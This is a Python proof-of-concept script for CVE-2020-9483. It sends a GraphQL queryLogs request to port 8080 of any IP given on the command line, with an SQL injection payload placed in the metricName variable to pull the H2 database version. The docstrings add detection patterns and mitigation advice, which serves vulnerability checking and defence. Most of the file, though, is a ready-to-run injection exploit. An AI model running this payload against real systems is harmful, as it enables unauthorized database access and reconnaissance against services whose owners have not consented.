CVE-2020-9483.py
# --CVE-2020-9483-PoC--
# -*- Encoding: utf-8 -*-
import requests
import json
import argparse
import sys
import re
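def host():
    """Build the GraphQL endpoint URL from the ``-ip`` command-line option.

    The scheme (plain ``http``), the port (``8080``) and the path
    (``/graphql``) are hard-coded, so a deployment that serves the endpoint
    over TLS or on another port is not reached by this check, and a
    "no response" result does not show that the host is unaffected.

    Returns:
        The endpoint URL as a string, e.g. ``http://192.0.2.10:8080/graphql``
        (constructed sample address).

    Exits:
        With status 2 after printing the usage line when argparse raises
        ``ArgumentError``.
    """
    parser = argparse.ArgumentParser(
        description='PoC for CVE-2020-9483 by shiro',
        exit_on_error=False,
    )
    parser.add_argument('-ip', required=True)
    try:
        args = parser.parse_args()
    except argparse.ArgumentError:
        # Depending on the Python version, some argparse errors (for example
        # a missing required option) may still be reported by argparse
        # itself, which also exits with status 2.
        print("[-]usage:python3 CVE-2020-9483.py -ip 127.0.0.1", file=sys.stderr)
        # A usage error is a failure: exit non-zero so wrapping scripts do not
        # record a bad invocation as a completed check.
        sys.exit(2)
    # The value is used verbatim; nothing here checks that it is an address.
    return "http://" + args.ip + ":8080" + "/graphql"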
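def poc(url):
    """Send the CVE-2020-9483 check to a GraphQL endpoint and report the result.

    The request is a ``queryLogs`` GraphQL query whose ``metricName``
    variable carries SQL text instead of a metric name.  The SQL calls
    ``h2version()``, an H2 function, so a positive result is only expected
    when the backend storage is H2 (inferred from the payload; confirm
    against the advisory).

    Notes for defenders:
      * Detection: a ``POST`` to ``/graphql`` whose ``metricName`` variable
        contains whitespace, ``union``, ``select``, ``--`` or
        ``INFORMATION_SCHEMA`` is not a legitimate metric name and is worth
        alerting on.
      * Mitigation: upgrade to a release that fixes CVE-2020-9483 (see the
        project's advisory for the affected range), and keep the GraphQL
        endpoint off untrusted networks.  In the server code, identifiers
        taken from a request belong on an allow-list and values in bound
        parameters, not in the SQL string.

    Args:
        url: Full URL of the GraphQL endpoint, as returned by ``host()``.

    Exits:
        With status 1 when the HTTP request fails.
    """
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36',
        'Content-type': 'application/json',
    }
    payload = {
        "query": "query queryLogs($condition: LogQueryCondition){queryLogs(condition: $condition){total,logs{serviceId,serviceName,isError,content}}}",
        "variables": {
            "condition": {
                "metricName": "INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --",
                "endpointId": "1",
                "traceId": "1",
                "state": "ALL",
                "stateCode": "1",
                "paging": {"pageSize": 10},
            }
        },
    }
    data = json.dumps(payload)
    try:
        res = requests.post(url=url, headers=header, data=data, timeout=3)
    except requests.exceptions.RequestException as exc:
        # ConnectionError alone does not cover a read timeout, which would
        # otherwise surface as an unhandled traceback despite timeout=3.
        if isinstance(exc, requests.exceptions.Timeout):
            print("[-]timeout :(")
        else:
            print("[-]request failed: " + type(exc).__name__)
        print("[-]bye~~~")
        # A failed request is not a completed check, so exit non-zero.
        sys.exit(1)
    print("[+]got response")

    # Any dotted number triple in the body matches, including one inside an
    # unrelated error message, so a match indicates a vulnerable backend
    # without proving it.
    version = re.findall(r"\d+\.\d+\.\d+", res.text)
    if not version:
        # Without a version string the response gives no evidence that the
        # injected SQL ran (patched server, other storage backend, HTTP error).
        print("[-]no version string in response (HTTP " + str(res.status_code)
              + "); injection not confirmed")
        print("[+]Done!")
        return
    print("[+]SQL Injection complete")
    print("[+]Database version is " + str(version))
    print("[+]Done!")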
# Script entry point: build the endpoint URL from the command line, then run
# the check against it.
if __name__ == "__main__":
    target_url = host()
    poc(target_url)